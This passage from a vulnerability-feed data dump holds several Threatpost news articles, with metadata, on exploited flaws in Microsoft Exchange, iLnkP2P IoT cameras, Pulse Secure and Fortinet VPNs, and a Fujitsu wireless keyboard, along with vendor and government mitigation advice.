flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\n## The Flaw\n\nAfter Microsoft patched the flaw in February researchers with the Zero Day Initiative (ZDI), which first reported the vulnerability, [published further details](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) of the flaw and how it could be exploited. And, on March 4, Rapid7 published a module that incorporated the exploit into the Metasploit penetration testing framework.\n\nThe vulnerability exists in the Exchange Control Panel (ECP), a web-based management interface for administrators, introduced in Exchange Server 2010. Specifically, instead of having cryptographic keys that are randomly generated on a per-installation basis, all installations in the configuration of ECP have the same cryptographic key values. These cryptographic keys are used to provide security for ViewState (a server-side data that ASP.NET web applications store in serialized format on the client).\n\nAccording to ZDI, an attacker could exploit a vulnerable Exchange server if it was unpatched (before Feb. 11, 2020), if the ECP interface was accessible to the attacker, and if the attacker has a working credential allowing them to access the ECP. After accessing the ECP using compromised credentials, attackers can take advantage of the fixed cryptographic keys by tricking the server into deserializing maliciously crafted ViewState data, then allowing them to take over Exchange server.\n\n\u201cWe realized the severity of this bug when we purchased it,\u201d Brian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program told Threatpost via email. \u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog. We felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\n## Brute Force\n\nResearchers said, while an attacker would need a credential to leverage the exploit, the credential does not need to be highly privileged or even have ECP access.\n\nAfter technical details of the flaw were disclosed, researchers said they observed multiple APT groups attempting to brute force credentials by leveraging Exchange Web Services (EWS), which they said was likely an effort to exploit this vulnerability.\n\n\u201cWhile brute-forcing credentials is a common occurrence, the frequency and intensity of attacks at certain organizations has increased dramatically following the vulnerability disclosure,\u201d researchers said.\n\nResearchers said they believe these efforts to be sourced from \u201cknown APT groups\u201d due to the overlap of their IP addresses from other, previous attacks. Also, in some cases, the credentials used were tied to previous breaches by the APT groups.\n\n## Going Forward\n\nIn the coming months, Adair told Threatpost he suspects there could easily be hundreds of organizations being hit with this exploit.\n\n\u201cFrom our perspective the successful attacks we have seen are just a handful of different servers and organizations,\u201d Adair said. \u201cHowever, I would expect that attackers have been access compromised credentials all around the world and are not able to make better use of them.\u201d** **\n\nResearchers encourage organizations to ensure that they\u2019re up to date on security updates from Microsoft, as well as place access control list (ACL) restrictions on the ECP virtual directory or via any web application firewall capability. Firms should also continue to expire passwords and require users to update passwords periodically, researchers said.\n\n\u201cThis vulnerability underscores such a case where an organization can be locked down, have properly deployed 2FA, and still have an incident due to outdated or weak password,\u201d said researchers.\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n", "cvss3": {}, "published": "2020-03-09T18:01:41", "type": "threatpost", "title": "Microsoft Exchange Server Flaw Exploited in APT Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-09T18:01:41", "id": "THREATPOST:F54F8338674294DE3D323ED03140CB71", "href": "https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:06", "description": "Over 2 million IP security cameras, baby monitors and smart doorbells have serious vulnerabilities that could enable an attacker to hijack the devices and spy on their owners \u2014 and there\u2019s currently no known patch for the shared flaws.\n\nThe attack stems from peer-to-peer (P2P) communication technology in all of these Internet of Things (IoT) devices, which allows them to be accessed without any manual configuration. The particular P2P solution that they use, iLnkP2P, is developed by Shenzhen Yunni Technology and contains two vulnerabilities that could allow remote hackers to find and take over vulnerable cameras used in the devices.\n\n\u201cOver 2 million vulnerable devices have been identified on the internet, including those distributed by HiChip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight and HVCAM,\u201d said Paul Marrapese, a security engineer who discovered the flaws, in a [post last week](<https://hacked.camera/>). \u201cAffected devices use a component called iLnkP2P. Unfortunately, iLnkP2P is used by hundreds of other brands as well, making identification of vulnerable devices difficult.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe first iLnkP2P bug is an enumeration vulnerability ([CVE-2019-11219](<https://nvd.nist.gov/vuln/detail/CVE-2019-11219>)), which enables attackers to discover exploitable devices that are online. The second is an authentication vulnerability ([CVE-2019-11220](<https://nvd.nist.gov/vuln/detail/CVE-2019-11220>)) that allows remote attackers to intercept user-to-device traffic in cleartext, including video streams and device credentials.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29091449/security-camera-hack.png>)\n\nThe UID prefixes on devices known to be vulnerable.\n\nIoT device users can discover if they are impacted by looking at their device\u2019s UID, which is its unique identifier. The first prefix part of a UID indicates exploitability: For instance, devices with the FFFF prefix are among those that are vulnerable. A list of all the prefixes that are known to be vulnerable is available in the image to the left.\n\nMarrapese said that he sent an initial advisory to device vendors regarding the security issues Jan. 15; and an advisory to the developers of iLnkP2P on Feb. 4, once he was able to identify them. He said that he has not received any responses despite multiple attempts at contact. The vulnerabilities were publicly disclosed April 24.\n\nIf consumers are impacted, they should block outbound traffic to UDP port 32100, which prevents devices from being accessed from external networks through P2P. However, Marrapese said the main step users could take is to buy a new device.\n\n\u201cIdeally, buy a new device from a reputable vendor,\u201d he said. \u201cResearch suggests that a fix from vendors is unlikely, and these devices are often riddled with other security problems that put their owners at risk.\u201d\n\nIt\u2019s hardly the first security issue in security and surveillance cameras, which hold sensitive data and video footage ripe for the taking for hackers.\n\n[In July](<https://threatpost.com/security-glitch-in-iot-camera-enabled-remote-monitoring/134504/>), IoT camera maker Swann patched a flaw in its connected cameras that would allow a remote attacker to access their video feeds. And in September up to 800,000 IP-based closed-circuit television cameras [were vulnerable](<https://threatpost.com/zero-day-bug-allows-hackers-to-access-cctv-surveillance-cameras/137499/>) to a zero-day vulnerability that could have allowed hackers to access surveillance cameras, spy on and manipulate video feeds, or plant malware.\n\n\u201cSecurity cameras continue to be the oxymoron of the 21st century,\u201d Joe Lea, vice president of product at Armis, in an email. \u201cThis is a perfect storm of a security exposure for an IoT device \u2013 no authentication, no encryption, near impossible upgrade path. We have to stop enabling connectivity over security \u2013 this is a defining moment in how we see lack of security for devices and lack of response.\u201d\n\nIn a comment to Threatpost, Marrapese said that vendors have a big part to play when it comes to doing more to secure their connected devices.\n\n\u201cVendors need to stop relying on \u2018security through obscurity,'\u201d he said. \u201cThe use of deterrents is not sufficient; vendors need to develop serious application security practices.\u201d\n", "cvss3": {}, "published": "2019-04-29T13:37:40", "type": "threatpost", "title": "2 Million IoT Devices Vulnerable to Complete Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11219", "CVE-2019-11220", "CVE-2020-0688"], "modified": "2019-04-29T13:37:40", "id": "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "href": "https://threatpost.com/iot-devices-vulnerable-takeover/144167/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-05T19:26:27", "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company\u2019s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n\u201cIt is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,\u201d according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). \u201cAPT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n\u201cAttackers are increasingly targeting critical external applications \u2013 VPNs have been targeted even more this last year,\u201d said Zach Hanley, senior red team engineer at Horizon3.AI, via email. \u201cThese three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.\u201d\n\nHanley added, \u201cThe common theme here is: once they are successful, they will look just like your normal users.\u201d\n\nThe bugs are popular with cyberattackers in general, due to Fortinet\u2019s widespread footprint, researchers noted.\n\n\u201cCVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,\u201d Satnam Narang, staff research engineer at Tenable, said via email. \u201cIn fact, Tenable\u2019s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.\u201d\n\nThe FBI and CISA didn\u2019t specify which APTs are mounting the recent activity.\n\n## Initial Compromise &amp; Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n\u201cThe APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,\u201d the warning explained. \u201cAPT actors may use other CVEs or common exploitation techniques\u2014such as spear-phishing\u2014to gain access to critical infrastructure networks to pre-position for follow-on attacks.\u201d\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year\u2019s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n\u201cIt\u2019s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,\u201d said Narang. \u201cOver the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven\u2019t done so already.\u201d\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization\u2019s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n * Implement network segmentation.\n * Require administrator credentials to install software.\n * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n * Use multifactor authentication where possible.\n * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Install and regularly update antivirus and anti-malware software on all hosts.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-02T19:56:57", "type": "threatpost", "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-9922"], "modified": "2021-04-02T19:56:57", "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-04T17:56:13", "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T17:42:30", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-30T22:23:47", "description": "Two high-severity flaws, discovered in a popular Fujitsu wireless keyboard set, could allow attackers from a short distance away to \u201ceavesdrop\u201d on passwords entered into the keyboards, or even fully takeover a victim\u2019s system.\n\nMaking matters worse, the impacted Fujitsu wireless keyboard LX390 reached end-of-life in May 2019 \u2013 meaning that a patch is not available and affected users are instead urged to replace their keyboards entirely.\n\n\u201cFujitsu has released two new wireless keyboard sets named LX410 and LX960 that are not affected by the described security issue,\u201d said Matthias Deeg, researcher with Germany-based 